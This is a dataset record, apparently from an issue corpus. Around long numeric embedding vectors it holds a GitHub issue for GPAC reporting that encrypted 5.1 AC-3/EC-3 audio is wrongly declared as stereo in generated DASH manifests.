-0.001011663698591292, 0.011191762052476406, 0.004345300607383251, 0.014125959947705269, -0.014379809610545635, 0.04593176767230034, 0.008690601214766502, -0.018321938812732697, -0.018441395834088326, -0.010669131763279438, -0.01405129861086607, 0.012550601735711098, 0.0003432096855249256, -0.005162844434380531, -0.005132979713380337, -0.05366670340299606, 0.017978494986891747, -0.003619217313826084, -0.02589261718094349, -0.003453095443546772, -0.004714875016361475, -0.0010863251518458128, -0.0001830373948905617, 0.010930446907877922, 0.0007064846577122808, 0.009019112214446068, 0.0069995177909731865, -0.020770836621522903, 0.013095631264150143, 0.0016248214524239302, 0.008227700367569923, 0.00963133666664362, -0.007473618723452091, 0.0006822196883149445, 0.0040429215878248215, 0.009452149271965027, -0.006174508016556501, -0.019083485007286072, -0.016604723408818245, -0.0007092845044098794, -0.011453078128397465, 0.00005307967876433395, 0.004487157799303532, -0.007376558613032103, -0.001618288573808968, 0.011998106725513935, 0.0024115671403706074, -0.006301432382315397, 0.019695710390806198, -0.015089093707501888, -0.012349016033113003, -0.004849265795201063, -0.01820247992873192, -0.00033481026184745133, -0.02129346691071987, -0.002783008385449648, -0.01493977103382349, -0.013192690908908844, 0.0014549664920195937, -0.006656074896454811, 0.0004043388180434704, 0.014230486005544662, -0.009452149271965027, -0.00680166482925415, -0.009392419829964638, -0.012259421870112419, -0.004871664568781853, 0.006417158059775829, -0.017844103276729584, 0.008272496983408928, 0.010467546060681343, -0.005767602939158678, -0.004569285083562136, -0.007033115718513727, 0.028281785547733307, -0.023548245429992676, 0.007973850704729557, -0.005663076415657997, 0.013267353177070618, 0.010803522542119026, -0.014305148273706436, 0.0016369539080187678, 0.01948665827512741, -0.006794198881834745, -0.0036005519796162844, -0.012513271532952785, -0.023667702451348305, 0.022174471989274025, -0.01667938381433487, 0.01636580564081669, -0.013364412821829319, -0.005685475189238787, 0.007802129257470369, 0.013349479995667934, 0.020502055063843727, 0.013058300130069256, 0.002915532561019063, 0.0038861322682350874, -0.00911617185920477, 0.0012991104740649462, 0.004386364482343197, 0.00964626856148243, 0.013319616205990314, -0.009534277021884918, -0.0004673344665206969, 0.011602400802075863, -0.0004265039460733533, 0.01653006114065647, 0.004741006530821323, -0.004054120741784573, -0.002454497618600726, 0.00008043612615438178, 0.00019400329620111734, 0.007257100194692612, 0.014200622215867043, -0.01008677203208208, 0.01083338726311922, 0.023145072162151337, 0.0071227094158530235, 0.005144178867340088, 0.015193619765341282, 0.004222108982503414, -0.004293037578463554, -0.001396170468069613, -0.0034362967126071453, 0.004438627511262894, 0.017963562160730362, 0.012677527032792568, -0.01745586469769478, 0.004039188381284475, -0.0009304692503064871, -0.013730254024267197, 0.006824063137173653, -0.007223502267152071, -0.011609867215156555, 0.006155842449516058, -0.00721230311319232, 0.020800700411200523, 0.012782053090631962, 0.017500661313533783, -0.009989711456000805, -0.007290697656571865, -0.0023481049574911594, -0.00023915019119158387, 0.0019337334670126438, -0.032910801470279694, -0.01113949902355671, -0.014977101236581802, 0.0007382158073596656, -0.01291644386947155, -0.009332690387964249, -0.012662594206631184, 0.004602883011102676, -0.011102168820798397, 0.0028539367485791445, -0.01888936571776867, 0.008108241483569145, 0.011833851225674152, -0.0010303290328010917, 0.004498356953263283, 0.008011181838810444, 0.010661665350198746, -0.003165648551657796, 0.006051316391676664, -0.008265030570328236, 0.028998535126447678, -0.002049458911642432, -0.01842646487057209, -0.005961722694337368, 0.003923463169485331, -0.001067659817636013, -0.0058012004010379314, 0.01705269142985344, -0.017664916813373566, 0.01633594185113907, -0.0019318669801577926, 0.0027195459697395563, -0.002012128010392189, 0.006323831155896187, -0.003576287068426609, 0.013267353177070618, 0.01187118235975504, -0.00052823027363047, 0.00852634571492672, -0.0008642071625217795, 0.0010583271505311131, 0.009922516532242298, -0.0070555140264332294, 0.026310721412301064, 0.007630407810211182, 0.0018413398647680879, -0.019471725448966026, -0.0013812382239848375, -0.010482477955520153, -0.0007354160188697278, 0.004072786308825016, 0.013767585158348083, 0.0041101169772446156, 0.02172650396823883, -0.012811917811632156, -0.007156306877732277, 0.005778802093118429, -0.005957989487797022, -0.01960611529648304, -0.01667938381433487, 0.0025870217941701412, -0.013028436340391636, -0.007160040084272623, -0.00326830823905766, 0.0068763261660933495, -0.008459150791168213, -0.01548479963093996, -0.010079305619001389, -0.005450291093438864, 0.015798378735780716, 0.018725110217928886, -0.0022958419285714626, 0.01650019735097885, 0.038047511130571365, 0.003253375878557563, 0.0006220238283276558, -0.022682171314954758, 0.010415282100439072, -0.009541742503643036, 0.005782534833997488, -0.024294860661029816, 0.0015949568478390574, 0.0051105814054608345, 0.019352266564965248, -0.01047501154243946, 0.011154431849718094, 0.01083338726311922, -0.012737255543470383, -0.01255806814879179, -0.0017340139020234346, -0.0012179161421954632, 0.003706944640725851, -0.004692476708441973, -0.0015044297324493527, 0.0065590147860348225, 0.017575323581695557, -0.00444236071780324, -0.00538309570401907, 0.01204290334135294, 0.007593077141791582, 0.010168899782001972, 0.02060658112168312, 0.007036848459392786, 0.022338727489113808, 0.01313296239823103, 0.012782053090631962, -0.01163973193615675, -0.001067659817636013, -0.0009360688272863626, 0.018784839659929276, 0.01361826155334711, 0.022682171314954758, 0.0018432063516229391, -0.021338263526558876, 0.011005108244717121, 0.003079787828028202, -0.0002946796885225922, 0.01234154962003231, 0.001479231403209269, -0.013580931350588799, 0.007600543089210987, -0.004834333434700966, 0.01673911325633526, 0.005857196636497974, -0.011677062138915062, -0.003637882648035884, -0.016350872814655304, 0.005132979713380337, 0.03825656324625015, 0.007914121262729168, 0.014775515533983707, 0.005147912073880434, 0.010646733455359936, -0.04736527055501938, -0.013356946408748627, 0.01163973193615675, -0.001533361035399139, 0.010937913320958614, 0.0019094684394076467, -0.005909459665417671, 0.002911799354478717, -0.001798409502953291, 0.0014698987361043692, -0.010094238445162773, 0.032761476933956146, 0.016425535082817078, -0.021920623257756233, 0.006252902559936047, 0.00504338601604104, -0.01857578754425049, 0.0016313543310388923, 0.01764998398721218, 0.00827996339648962, -0.004696209914982319, -0.00022655105567537248, -0.01578344590961933, -0.0004430694680195302, 0.0076826708391308784, -0.013319616205990314, 0.005155378021299839, -0.02402607910335064, -0.015649056062102318, -0.02075590379536152, -0.021054549142718315, -0.012767120264470577, -0.0043676989153027534, 0.012334084138274193, 0.017470795661211014, -0.0349714569747448, -0.012602864764630795, 0.010952845215797424, -0.002232379512861371, 0.018127817660570145, -0.004841799847781658, -0.009847855195403099, 0.008167970925569534, -0.026415247470140457, -0.00023471716849599034, 0.0029006002005189657, 0.001051794271916151, -0.00813810620456934, -0.0009080707677640021, -0.0028688691090792418, 0.008854856714606285, -0.02508627250790596, 0.005849730223417282, 0.012274354696273804, -0.007257100194692612, 0.032134320586919785, 0.000608024769462645, -0.010728861205279827, 0.015798378735780716, 0.016798842698335648, 0.01882963627576828, -0.005592148285359144, -0.003830136265605688, -0.001915068132802844, -0.004192244727164507, 0.010952845215797424, -0.013722787611186504, -0.007510949391871691, -0.005987854208797216, 0.0009659334900788963, -0.0014670989476144314, -0.015514664351940155, 0.005554817151278257, -0.009011645801365376, 0.017127353698015213, 0.002605687128379941, -0.0032291109673678875, 0.007417622487992048, 0.009952381253242493, 0.020621512085199356, 0.011751723475754261, -0.007249633781611919, 0.02486228756606579, -0.009168434888124466, 0.0011339219054207206, -0.016828708350658417, -0.008772728964686394, -0.028595363721251488, -0.009019112214446068, 0.004830600693821907, -0.0007004184299148619, -0.02542971447110176, 0.01673911325633526, 0.003070455277338624, -0.03404565528035164, 0.014887508004903793, 0.003908530808985233, 0.009325223974883556, 0.0112962881103158, 0.0024488980416208506, 0.013110563158988953, 0.04375165328383446, 0.014536598697304726, 0.032044727355241776, -0.006685939617455006, 0.0072459010407328606, -0.025504376739263535, -0.0076266746036708355, 0.006435823161154985, -0.007645340170711279, -0.0046700784005224705, 0.004763405304402113, -0.02890894189476967, -0.012811917811632156, 0.0028744686860591173, 0.02763969637453556, 0.013155360706150532, 0.012050369754433632, -0.015559461899101734, -0.0011077903909608722, -0.006779266521334648, 0.006835262291133404, 0.010385418310761452, 0.01742599904537201, 0.010489944368600845, 0.013215090148150921, 0.010422748513519764, -0.013700389303267002, -0.014850176870822906, 0.05632465332746506, 0.008444217965006828, 0.009287893772125244, 0.010407816618680954, 0.008533812128007412, 0.020113814622163773, -0.012580466456711292, -0.0035837532486766577, -0.025788091123104095, 0.030551495030522346, 0.02095002308487892, 0.018530990928411484, 0.003964527044445276, -0.008951916359364986, -0.008324760012328625, -0.00399812450632453, -0.00451328931376338, -0.0038096043281257153, -0.0015613591531291604, -0.012378880754113197, -0.0013700389536097646, -0.0017144152661785483, 0.029356911778450012, -0.011468010023236275, 0.0023369058035314083, 0.005028453655540943, -0.024160468950867653, 0.0022417122963815928, 0.01039288379251957, -0.008332226425409317, 0.023697568103671074, -0.02626592479646206, 0.005132979713380337, 0.00776479858905077, 0.005405494477599859, -0.002267843810841441, 0.01785903610289097, 0.007051780819892883, 0.009213232435286045, -0.025638766586780548, -0.007137641776353121, 0.016350872814655304, -0.010975243523716927, 0.010796056129038334, 0.002267843810841441, 0.005028453655540943, -0.018620584160089493, -0.01277458667755127, 0.003255242481827736, 0.001924400799907744, 0.03308998793363571, 0.0011255224235355854, -0.006965920329093933, 0.011161898262798786, -0.015440003015100956, -0.00571907265111804, 0.0004766671627294272, 0.018560854718089104, -0.0022454452700912952, -0.019964491948485374, -0.019785303622484207, -0.011117100715637207, -0.016455400735139847, -0.003301905933767557, -0.027341049164533615, -0.0007111509912647307, -0.009698531590402126, 0.018217410892248154, -0.008787661790847778, 0.019068554043769836, -0.008698067627847195, 0.00556228356435895, -0.012826849706470966, -0.00227530999109149, -0.0012580467155203223, -0.016783909872174263, -0.0025459579192101955, 0.001142321270890534, -0.000509098288603127, -0.0042482404969632626, 0.011893580667674541, -0.01945679262280464, 0.002013994613662362, -0.020397529006004333, -0.009840388782322407, -0.0147083206102252, -0.0067456685937941074, -0.014342478476464748, -0.020875362679362297, 0.030103527009487152, 0.011647197417914867, 0.0014129693154245615, -0.007100311107933521, -0.007899189367890358, 0.016380738466978073, -0.014073696918785572, -0.0032067124266177416, -0.014043832197785378, -0.003637882648035884, 0.02502654306590557, 0.0032403101213276386, 0.017097488045692444, -0.013349479995667934, -0.006880059372633696, -0.0018758707446977496, -0.018441395834088326, 0.010415282100439072, -0.013551066629588604, 0.000022529698981088586, -0.008048512041568756, 0.009213232435286045, -0.00035300900344736874, -0.023861823603510857, -0.0010060640051960945, 0.013565998524427414, 0.016948165372014046, 0.007410156074911356, 0.012139963917434216, 0.030670953914523125, 0.010579537600278854, 0.006529150065034628, 0.0017582789296284318, 0.024533776566386223, 0.011789054609835148, 0.004487157799303532, -0.008996713906526566, 0.011714393272995949, 0.020039152354002, -0.005700407549738884, 0.014544065110385418, -0.006383560132235289, -0.015977565199136734, 0.010041974484920502, 0.006387293338775635, -0.0022043813951313496, 0.006260368973016739, -0.0224432535469532, 0.00939988624304533, 0.025160932913422585, -0.0010013977298513055, -0.0013485737144947052, 0.04004844278097153, 0.00045870174653828144, 0.014379809610545635, -0.021860893815755844, -0.0017358803888782859, -0.0027792751789093018, 0.005132979713380337, 0.002223046962171793, -0.029954202473163605, 0.012207158841192722, -0.0007242168067023158, -0.003617350710555911, 0.01031822245568037, 0.0014801647048443556, -0.0004964991239830852, 0.01546986773610115, 0.00662247696891427, -0.014611260034143925, 0.007257100194692612, 0.0071861715987324715, 0.01511149201542139, -0.00545402429997921, 0.00664487574249506, 0.011609867215156555, 0.005121780559420586, -0.013692923821508884, -0.012602864764630795, 0.013035901822149754, -0.009519344195723534, -0.012214625254273415, 0.0016425534849986434, -0.001978530315682292, -0.012274354696273804, 0.00732056237757206, 0.004020523279905319, 0.013222555629909039, -0.009295359253883362, 0.006652341689914465, 0.019695710390806198, 0.007540814112871885, -0.0023033081088215113, 0.005181509535759687, 0.014551530592143536, 0.04584217444062233, -0.007279498502612114, -0.015514664351940155, -0.009407351724803448, 0.005767602939158678, 0.004244507756084204, 0.0003688745782710612, -0.010206229984760284, 0.015589326620101929, 0.0000691202367306687, -0.018321938812732697, 0.014678455889225006, 0.015977565199136734, -0.008922051638364792, 0.02324959821999073, 0.001128322328440845, 0.00639475928619504, -0.030148323625326157, -0.012177294120192528, 0.0036658807657659054 ]
101
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
- [x] I looked for a similar issue - [x] I tried with the latest version of GPAC - [x] I give enough information for contributors to reproduce my issue There used to be an issue with encrypted 5.1 audio reported here https://github.com/gpac/gpac/issues/1274. Now it works great for 5.1 encrypted audio in AAC codec, however, it appears that there still needs to be an extra adjustment for AC-3/EC-3 codecs under the same scenario as it reports just 2 channels instead of 6 in the generated mpd even in the latest nightly 1.1.0 GPAC version. The unencrypted 5.1 audio in AC-3/EC-3 codecs is correctly reported as 6 channels, the hex value in AudioChannelConfiguration is `F801`, which corresponds to the FL, C, FR, LS, RS, LFE mapping. But encrypted audio reports `A000`, which to my knowledge is just basic stereo in 16-bit representation, the result is: `<Representation id="2" mimeType="audio/mp4" codecs="ac-3" audioSamplingRate="48000" bandwidth="640000"> <AudioChannelConfiguration schemeIdUri="tag:dolby.com,2014:dash:audio_channel_configuration:2011" value="A000"/> </Representation>` The result can be verified with this sample content https://devs.origin.cdn.cra.cz/log/ac3.mp4 in unencrypted form and https://devs.origin.cdn.cra.cz/log/ac3enc.mp4 as encrypted. Also when dashing the encrypted version, log reports the following notification `[iso file] Unknown box type dac3 in parent enca`. Interesting thing is that when encrypting EC-3 codec, the message still mentions `dac3` even though the box is actually `dec3`. The file was encrypted by mp4box. and both AC-3 and EC-3 should be supported in ISO format normally I believe.
Encrypted multichannel AC-3 audio declared as stereo after dashing
https://api.github.com/repos/gpac/gpac/issues/1859/comments
1
2021-07-14T09:16:00
2021-07-14T10:52:43Z
https://github.com/gpac/gpac/issues/1859
944,220,149
1,859
false
This is a GitHub Issue repo:gpac owner:gpac Title : Encrypted multichannel AC-3 audio declared as stereo after dashing Issue date: --- start body --- - [x] I looked for a similar issue - [x] I tried with the latest version of GPAC - [x] I give enough information for contributors to reproduce my issue There used to be an issue with encrypted 5.1 audio reported here https://github.com/gpac/gpac/issues/1274. Now it works great for 5.1 encrypted audio in AAC codec, however, it appears that there still needs to be an extra adjustment for AC-3/EC-3 codecs under the same scenario as it reports just 2 channels instead of 6 in the generated mpd even in the latest nightly 1.1.0 GPAC version. The unencrypted 5.1 audio in AC-3/EC-3 codecs is correctly reported as 6 channels, the hex value in AudioChannelConfiguration is `F801`, which corresponds to the FL, C, FR, LS, RS, LFE mapping. But encrypted audio reports `A000`, which to my knowledge is just basic stereo in 16-bit representation, the result is: `<Representation id="2" mimeType="audio/mp4" codecs="ac-3" audioSamplingRate="48000" bandwidth="640000"> <AudioChannelConfiguration schemeIdUri="tag:dolby.com,2014:dash:audio_channel_configuration:2011" value="A000"/> </Representation>` The result can be verified with this sample content https://devs.origin.cdn.cra.cz/log/ac3.mp4 in unencrypted form and https://devs.origin.cdn.cra.cz/log/ac3enc.mp4 as encrypted. Also when dashing the encrypted version, log reports the following notification `[iso file] Unknown box type dac3 in parent enca`. Interesting thing is that when encrypting EC-3 codec, the message still mentions `dac3` even though the box is actually `dec3`. The file was encrypted by mp4box. and both AC-3 and EC-3 should be supported in ISO format normally I believe. --- end body ---
1,831
[ -0.014737359248101711, 0.013280525803565979, -0.026078123599290848, -0.0010513749439269304, 0.0004029432311654091, 0.01719224452972412, -0.01612980291247368, 0.05766162648797035, -0.014061259105801582, 0.044880129396915436, 0.021635184064507484, -0.009924174286425114, 0.000036722663935506716, 0.026899101212620735, -0.013320770114660263, 0.02025078982114792, -0.013336867094039917, 0.0076986802741885185, -0.006004407536238432, 0.005525503773242235, 0.0407591387629509, -0.019977129995822906, 0.027720078825950623, 0.03103618510067463, 0.018930785357952118, 0.032243505120277405, -0.019848348572850227, 0.009553929790854454, -0.025273242965340614, 0.028428373858332634, 0.015598581172525883, 0.016934681683778763, -0.047809891402721405, 0.013513941317796707, 0.018785906955599785, -0.0053444053046405315, -0.0041692801751196384, 0.042851828038692474, 0.019268834963440895, -0.007658436428755522, -0.019220542162656784, -0.006410872098058462, -0.017820050939917564, 0.028315691277384758, -0.01854444295167923, 0.025707878172397614, -0.02187664806842804, 0.024693729355931282, -0.026561051607131958, 0.0026460441295057535, -0.005457088816910982, -0.045974764972925186, -0.04723037779331207, -0.016017118468880653, -0.02546641416847706, -0.04046938195824623, 0.027414225041866302, 0.004330256022512913, 0.002354274969547987, 0.03673473745584488, 0.007179532665759325, 0.012918329797685146, -0.0278488602489233, 0.04201475530862808, -0.013570282608270645, 0.0037608034908771515, -0.025836659595370293, 0.03007032908499241, -0.022423965856432915, 0.017691269516944885, -0.01749809831380844, -0.007799290586262941, 0.01740151271224022, 0.021232742816209793, 0.03256545960903168, -0.03718547150492668, 0.04723037779331207, 0.04043718799948692, -0.006036602426320314, 0.02371177449822426, -0.07070069015026093, 0.029893256723880768, -0.042465485632419586, 0.015316872857511044, 0.031100576743483543, 0.0024146409705281258, -0.06876897811889648, -0.05444210767745972, -0.020588839426636696, 0.01442345604300499, -0.020991278812289238, 0.018608832731842995, 0.03060154989361763, -0.015510044060647488, 0.004994282498955727, 0.021361524239182472, -0.05222063511610031, 0.002674215007573366, -0.038086939603090286, -0.028911301866173744, -0.026866905391216278, -0.005996358580887318, -0.027639590203762054, -0.019478105008602142, 0.04929087311029434, -0.017948832362890244, -0.009545881301164627, -0.016314923763275146, 0.007666485384106636, 0.11461496353149414, 0.011711008846759796, 0.01532492134720087, 0.007992462255060673, 0.004310134332627058, -0.002057475270703435, 0.03100399114191532, -0.040791336447000504, -0.022568844258785248, 0.00443891528993845, 0.021329328417778015, 0.005110990256071091, -0.04182158410549164, -0.022858601063489914, 0.011976619251072407, -0.006479286588728428, 0.05080404877662659, -0.021248841658234596, 0.008004534989595413, -0.03599425032734871, 0.004543549381196499, -0.06554945558309555, -0.01607345975935459, -0.015099555253982544, -0.022697625681757927, 0.016564438119530678, 0.007920022122561932, -0.04359231889247894, 0.024130312725901604, -0.006990385707467794, 0.019011273980140686, -0.02310006506741047, -0.021361524239182472, 0.05804796889424324, -0.0005915870424360037, -0.02403372712433338, 0.008378804661333561, 0.015831995755434036, 0.02131323143839836, -0.024500558152794838, 0.00874904915690422, 0.010085150599479675, 0.016161996871232986, -0.017369316890835762, 0.008443194441497326, 0.041242070496082306, 0.01658053509891033, -0.0028533008880913258, 0.022069819271564484, -0.008491487242281437, -0.001088600605726242, 0.008555877953767776, -0.016516145318746567, 0.009803442284464836, -0.012548084370791912, 0.02525714598596096, -0.021474206820130348, 0.02714056521654129, 0.003919767215847969, -0.010729054920375347, 0.03196984902024269, -0.0019105847459286451, 0.008322462439537048, 0.012765401974320412, 0.011284422129392624, -0.021248841658234596, -0.02393714152276516, 0.017465902492403984, 0.03657376393675804, -0.02818690985441208, 0.002013206947594881, -0.04098450765013695, -0.00047714312677271664, 0.02582056075334549, -0.014069308526813984, 0.018737614154815674, -0.020154204219579697, 0.041242070496082306, -0.04880794510245323, 0.0071231909096241, -0.0016117729246616364, 0.03844108432531357, 0.03525375947356224, 0.029539108276367188, -0.030714234337210655, -0.001420613843947649, -0.00693806866183877, -0.00812526699155569, -0.045491836965084076, 0.00297604501247406, 0.0023200674913823605, 0.011606374755501747, -0.026013731956481934, 0.030488867312669754, -0.01701517030596733, -0.07462850213050842, 0.0144717488437891, -0.010946372523903847, 0.0780411958694458, 0.026239098981022835, -0.007296240422874689, -0.0565669909119606, -0.028122518211603165, 0.03235619142651558, 0.013988819904625416, 0.008885879069566727, 0.007215752266347408, -0.005935992579907179, 0.028879106044769287, 0.003790986491367221, -0.01828688196837902, 0.05637381970882416, -0.017787855118513107, 0.0009462374728173018, -0.0070869713090360165, -0.03164789453148842, -0.017369316890835762, 0.013650770299136639, 0.01304711028933525, 0.003352326573804021, -0.014101503416895866, 0.01628272980451584, 0.016677120700478554, -0.017482001334428787, 0.007944168522953987, 0.016982974484562874, -0.024387873709201813, -0.012926378287374973, -0.005694528575986624, -0.006430993787944317, 0.02530543878674507, -0.05589089170098305, 0.05814455449581146, -0.004519402980804443, -0.0451698862016201, -0.04565281420946121, 0.020862499251961708, 0.012612475082278252, 0.028557155281305313, -0.025723975151777267, 0.032645948231220245, 0.00019090755085926503, 0.01157417893409729, -0.0013049122644588351, -0.010423200204968452, -0.02950691245496273, 0.016371266916394234, 0.012950524687767029, 0.007465265225619078, -0.014809798449277878, -0.03670254349708557, 0.021989330649375916, -0.0011288446839898825, -0.028879106044769287, -0.0071553862653672695, -0.016266630962491035, -0.02976447530090809, -0.006475262343883514, 0.006865629460662603, -0.0034891562536358833, -0.041403044015169144, 0.004153182730078697, 0.017385415732860565, -0.042368900030851364, -0.001072503044269979, 0.017240537330508232, 0.01262857299298048, 0.013860039412975311, -0.027414225041866302, 0.018077611923217773, 0.01587224006652832, 0.015711264684796333, 0.01801322214305401, 0.019220542162656784, -0.00657587219029665, -0.027285443618893623, 0.017240537330508232, -0.018399564549326897, 0.023615188896656036, -0.028347885236144066, -0.0014065284049138427, 0.006921970751136541, 0.017111755907535553, -0.04748794063925743, -0.002702385652810335, -0.007618192583322525, -0.012049058452248573, 0.0066000185906887054, 0.00848343875259161, 0.03130984678864479, -0.03876303881406784, -0.03998645395040512, 0.0017204317264258862, -0.015252482146024704, -0.004841355141252279, -0.07070069015026093, 0.0032859239727258682, -0.040050845593214035, 0.0368313230574131, -0.030891306698322296, 0.0000735710927983746, 0.007227825466543436, -0.025369828566908836, -0.046361107379198074, -0.006837458349764347, -0.026078123599290848, -0.015880288556218147, -0.0037386692129075527, -0.011501739732921124, -0.03493180498480797, 0.028685934841632843, 0.017127852886915207, 0.02157079242169857, -0.044880129396915436, 0.002046408364549279, -0.02380836009979248, -0.018657125532627106, -0.00025492068380117416, -0.02551470696926117, -0.03618742153048515, 0.0038734865374863148, 0.0003662205417640507, 0.019719569012522697, 0.020572742447257042, 0.003839279292151332, -0.008427097462117672, -0.0260942205786705, -0.023132260888814926, -0.015051262453198433, -0.004098853096365929, -0.019800055772066116, 0.009586124680936337, 0.03480302542448044, -0.0009110239334404469, 0.007199654821306467, -0.01409345492720604, -0.016854194924235344, -0.026142513379454613, 0.016467852517962456, 0.015099555253982544, -0.0022053720895200968, 0.0010875945445150137, 0.0026722026523202658, 0.01258028019219637, 0.006817336659878492, 0.022633235901594162, 0.0001647489407332614, -0.042207926511764526, -0.015067360363900661, 0.025498609989881516, -0.012878085486590862, 0.006322334986180067, -0.02950691245496273, 0.004809160251170397, 0.020331276580691338, -0.011799545958638191, -0.0011026860447600484, 0.0036541568115353584, 0.02371177449822426, -0.000465321441879496, -0.0302474033087492, 0.004062633495777845, 0.0061814808286726475, -0.057371869683265686, 0.02021859399974346, -0.026818612590432167, 0.015405409969389439, 0.008910025469958782, -0.015751508995890617, -0.022858601063489914, 0.017482001334428787, -0.03863425552845001, 0.028025932610034943, 0.036412786692380905, -0.04050157964229584, 0.00995637010782957, 0.021683476865291595, 0.018576638773083687, 0.03779717907309532, -0.018077611923217773, -0.024999583140015602, -0.034094732254743576, 0.03522156551480293, -0.025273242965340614, -0.034255705773830414, -0.03415912017226219, 0.01532492134720087, -0.049966972321271896, -0.013771502301096916, -0.0025011657271534204, -0.05395917966961861, 0.016234437003731728, -0.020669328048825264, -0.0011550033232197165, 0.009529783390462399, -0.027060076594352722, 0.02485470473766327, -0.030408378690481186, -0.018576638773083687, 0.03253326192498207, 0.012596377171576023, -0.0037547668907791376, -0.021248841658234596, -0.01203296147286892, 0.0034710464533418417, -0.013304672203958035, -0.006000382825732231, -0.03100399114191532, 0.025224950164556503, -0.028557155281305313, 0.020138105377554893, -0.0045475740917027, 0.006157334428280592, 0.008157461881637573, -0.027784468606114388, 0.02928154729306698, 0.020089812576770782, 0.001948816585354507, 0.003947937861084938, 0.05878845974802971, -0.029056180268526077, 0.02332543209195137, -0.02253665030002594, 0.014447602443397045, -0.03892401233315468, -0.009763198904693127, -0.007026605308055878, -0.05502162128686905, -0.008684658445417881, -0.014656870625913143, 0.014568334445357323, -0.03454546257853508, 0.03219521418213844, -0.011799545958638191, 0.00024397936067543924, 0.04716598987579346, -0.025369828566908836, -0.020460058003664017, -0.017369316890835762, -0.009803442284464836, -0.0022757991682738066, -0.016419559717178345, 0.015051262453198433, -0.03159960359334946, -0.029700085520744324, -0.020798107609152794, 0.013055158779025078, -0.007658436428755522, -0.002209396567195654, 0.040662553161382675, 0.026029830798506737, -0.03647717833518982, 0.05109380558133125, -0.0024810435716062784, 0.004092816729098558, 0.048518188297748566, 0.012008815072476864, -0.04059816524386406, -0.04433280974626541, 0.025176657363772392, 0.0027104346081614494, 0.014592480845749378, -0.0006353523931466043, 0.02393714152276516, 0.015035164542496204, -0.024001531302928925, 0.03335424140095711, 0.007429045625030994, -0.04871135950088501, 0.014165894128382206, -0.024130312725901604, -0.003072630614042282, -0.014552236534655094, 0.021860549226403236, 0.04835721105337143, -0.013513941317796707, -0.01785224676132202, 0.0013994857436046004, 0.027414225041866302, -0.0591748021543026, -0.012403205968439579, 0.015654923394322395, 0.00565428426489234, 0.04455817490816116, -0.016628827899694443, 0.01093832403421402, 0.0066000185906887054, -0.019397616386413574, 0.01311150100082159, 0.046715255826711655, 0.013433452695608139, -0.02073371782898903, -0.007879778742790222, 0.00782343652099371, -0.02083030343055725, 0.012065156362950802, 0.005891724023967981, -0.02073371782898903, 0.03927816078066826, -0.0004205499717500061, 0.01550199557095766, -0.01859273575246334, 0.011244178749620914, -0.0013994857436046004, -0.019091762602329254, -0.019107859581708908, -0.015252482146024704, -0.010970518924295902, -0.011759301647543907, -0.0011992717627435923, 0.0034992173314094543, -0.021812256425619125, -0.016210289672017097, 0.014584431424736977, 0.017031267285346985, 0.011654667556285858, 0.01532492134720087, 0.02289079688489437, 0.008668561466038227, 0.001629882724955678, -0.007179532665759325, -0.04793867468833923, -0.022246893495321274, 0.012660767883062363, -0.011075153946876526, -0.000995033304207027, 0.023212749511003494, -0.010342712514102459, 0.006088919937610626, -0.0014346991665661335, -0.009602222591638565, -0.0269634909927845, 0.04713379219174385, -0.03121325932443142, 0.029442522674798965, -0.020025422796607018, 0.02775227464735508, 0.02037956938147545, -0.00006690567533951253, 0.015091506764292717, -0.009199782274663448, -0.004072694573551416, -0.012258327566087246, 0.010680762119591236, 0.022504454478621483, -0.000904987333342433, 0.008507585152983665, 0.023921044543385506, 0.018512247130274773, 0.017288830131292343, -0.013868087902665138, 0.0038211694918572903, 0.03034398891031742, 0.006302213296294212, 0.011622471734881401, 0.0012908268254250288, 0.0005880657117813826, 0.018657125532627106, 0.019043469801545143, -0.018254686146974564, -0.03612302988767624, -0.003002203768119216, -0.006052700337022543, 0.011767350137233734, 0.011364910751581192, -0.011099300347268581, 0.027768371626734734, 0.02622300200164318, 0.006302213296294212, -0.004648183938115835, 0.006137212738394737, -0.0006293157930485904, -0.026722026988863945, 0.004193426575511694, -0.006048675626516342, 0.013562234118580818, -0.03148691728711128, 0.008362706750631332, -0.008789293467998505, -0.044397201389074326, -0.015485897660255432, -0.008165511302649975, 0.03898840397596359, 0.004446963779628277, -0.01801322214305401, 0.033869363367557526, 0.00028271423070691526, -0.012065156362950802, 0.029040083289146423, 0.012193936854600906, -0.008773195557296276, -0.041370850056409836, 0.0495484322309494, 0.026544952765107155, -0.022681528702378273, -0.0008204748737625778, -0.011348812840878963, -0.008958318270742893, 0.028025932610034943, -0.014447602443397045, 0.02152249962091446, -0.010302468203008175, 0.019236641004681587, 0.05753284692764282, 0.009135391563177109, 0.02306787110865116, 0.04275524243712425, 0.03269423916935921, 0.003943913616240025, 0.015936629846692085, -0.010181736201047897, 0.035929858684539795, -0.030005939304828644, 0.021506402641534805, -0.013280525803565979, 0.03934255242347717, 0.01538931205868721, 0.011292471550405025, -0.016322974115610123, -0.010624420829117298, -0.000985475373454392, -0.03502839431166649, 0.006986361462622881, -0.016065411269664764, -0.026335684582591057, -0.01642760820686817, -0.0026842758525162935, 0.0006333402125164866, 0.007726851385086775, 0.002959947567433119, 0.014890286140143871, -0.027172761037945747, -0.02380836009979248, -0.023164456710219383, 0.019800055772066116, -0.023840555921196938, 0.03230789676308632, 0.0017707367660477757, -0.017610782757401466, 0.010745152831077576, 0.019397616386413574, -0.030263500288128853, -0.02928154729306698, 0.01691858470439911, 0.02876642346382141, 0.025224950164556503, 0.002253664890304208, 0.024581044912338257, 0.023228846490383148, -0.004789038095623255, -0.04143524169921875, -0.028508862480521202, -0.029667889699339867, -0.01849615015089512, -0.03512497991323471, 0.007706729229539633, 0.016057362779974937, 0.016805902123451233, -0.02714056521654129, -0.020991278812289238, 0.015807850286364555, 0.01612980291247368, -0.024275191128253937, 0.030215207487344742, -0.008068925701081753, 0.019655177369713783, -0.02810642123222351, -0.016854194924235344, -0.000760108872782439, -0.032726433128118515, -0.013449550606310368, -0.018624931573867798, 0.0035837297327816486, -0.01273320708423853, -0.009054903872311115, -0.004398670978844166, 0.018093710765242577, 0.0033684242516756058, -0.02149030566215515, -0.008241974748671055, -0.04681184142827988, 0.03011862188577652, -0.007437094580382109, 0.012507840059697628, 0.037282057106494904, -0.016870291903614998, 0.019703470170497894, 0.0025393974501639605, 0.031197162345051765, -0.03306448459625244, -0.0042175729759037495, -0.02889520488679409, -0.0024911046493798494, 0.00918368436396122, -0.016516145318746567, -0.03357960656285286, 0.02780056744813919, 0.007791241630911827, 0.0004595363570842892, 0.00036119006108492613, 0.010600274428725243, -0.01564687304198742, 0.016435656696558, 0.019107859581708908, 0.01701517030596733, 0.008942220360040665, -0.005601967219263315, 